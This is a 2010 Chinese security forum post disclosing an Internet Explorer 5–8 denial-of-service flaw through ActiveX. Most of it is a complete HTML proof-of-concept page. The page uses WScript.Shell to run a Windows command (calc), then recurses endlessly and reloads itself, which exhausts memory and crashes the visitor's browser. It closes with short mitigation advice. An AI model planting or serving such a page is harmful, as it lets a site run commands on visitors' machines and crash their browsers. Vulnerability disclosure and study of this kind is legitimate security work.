创意安天

 找回密码
 注册创意安天

Internet Explorer 无限循环拒绝服务漏洞

[复制链接]
发表于 2010-3-20 12:46 | 显示全部楼层 |阅读模式
该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。
测试代码
<html>
<title>cnhackerx@163.com</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("calc", 1);
}
function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
影响版本
Internet Explorer 5,6,7,8

安全建议
禁止ActiveX控件自动运行。
不要手工运行该类控件运行。
您需要登录后才可以回帖 登录 | 注册创意安天

本版积分规则

小黑屋|手机版|Archiver|创意安天 ( 京ICP备09068574,ICP证100468号。 )

GMT+8, 2024-3-29 12:51

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表